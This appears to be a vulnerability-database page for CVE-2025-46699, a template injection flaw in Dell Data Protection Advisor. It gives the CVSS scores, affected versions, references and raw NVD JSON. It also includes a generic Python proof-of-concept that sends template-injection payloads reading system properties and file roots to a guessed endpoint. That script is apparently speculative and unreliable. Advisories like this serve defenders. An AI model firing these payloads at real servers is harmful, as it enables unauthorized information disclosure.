CVE-2025-46699

Description

Dell Data Protection Advisor, versions prior to 19.12, contains an Improper Neutralization of Special Elements Used in a Template Engine vulnerability in the Server. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information exposure.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:dell:data_protection_advisor:*:*:*:*:*:*:*:* - VULNERABLE

Dell Data Protection Advisor < 19.12

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-46699 PoC - Dell Data Protection Advisor Template Injection
# This PoC demonstrates information disclosure via template injection

import requests
import sys

target_url = "http://target-server/api/template"  # Replace with actual endpoint

def test_template_injection(target):
    """Test for template injection vulnerability"""
    headers = {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer <low_privilege_token>'  # Low privilege access
    }
    
    # Payload to test for template injection and extract system information
    # Using common template engine syntax (adjust based on target engine)
    payloads = [
        # Test payload - should cause error or unexpected behavior if vulnerable
        '{"input":"${7*7}"}',
        # Information disclosure payload
        '{"input":"${T(java.lang.System).getProperty("user.name")}"}',
        # File read attempt (if applicable)
        '{"input":"${T(java.io.File).listRoots()}"}'
    ]
    
    print(f"[*] Testing CVE-2025-46699 on {target}")
    
    for i, payload in enumerate(payloads, 1):
        try:
            response = requests.post(target, json={'template': payload}, headers=headers, timeout=10)
            print(f"\n[+] Payload {i} sent")
            print(f"[*] Status Code: {response.status_code}")
            print(f"[*] Response: {response.text[:500]}")
            
            # Check for successful exploitation indicators
            if '49' in response.text or 'root' in response.text:
                print("[!] Potential vulnerability confirmed - template injection detected")
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
    
    print("\n[*] Note: This PoC requires identification of actual vulnerable endpoint")
    print("[*] Refer to Dell advisory DSA-2025-075 for specific remediation")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        test_template_injection(sys.argv[1])
    else:
        print("Usage: python cve-2025-46699_poc.py <target_url>")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-46699
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-46699
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-46699/
[4] VulDB https://vuldb.com/cve/CVE-2025-46699
[5] https://www.dell.com/support/kbdoc/en-us/000281732/dsa-2025-075-security-update-for-dell-data-protection-advisor-for-multiple-component-vulnerabilities

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-46699", "sourceIdentifier": "[email protected]", "published": "2026-01-23T10:15:52.847", "lastModified": "2026-01-28T18:59:26.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell Data Protection Advisor, versions prior to 19.12, contains an Improper Neutralization of Special Elements Used in a Template Engine vulnerability in the Server. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information exposure."}, {"lang": "es", "value": "Dell Data Protection Advisor, versiones anteriores a la 19.12, contiene una vulnerabilidad de neutralización incorrecta de elementos especiales utilizados en un motor de plantillas en el servidor. Un atacante en remoto con pocos privilegios podría, potencialmente, explotar esta vulnerabilidad, lo que podría llevar a la exposición de información."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:data_protection_advisor:*:*:*:*:*:*:*:*", "versionStartIncluding": "19.9", "versionEndExcluding": "19.12", "matchCriteriaId": "F993597A-30A5-4D7B-83D9-162CC1899B78"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000281732/dsa-2025-075-security-update-for-dell-data-protection-advisor-for-multiple-component-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}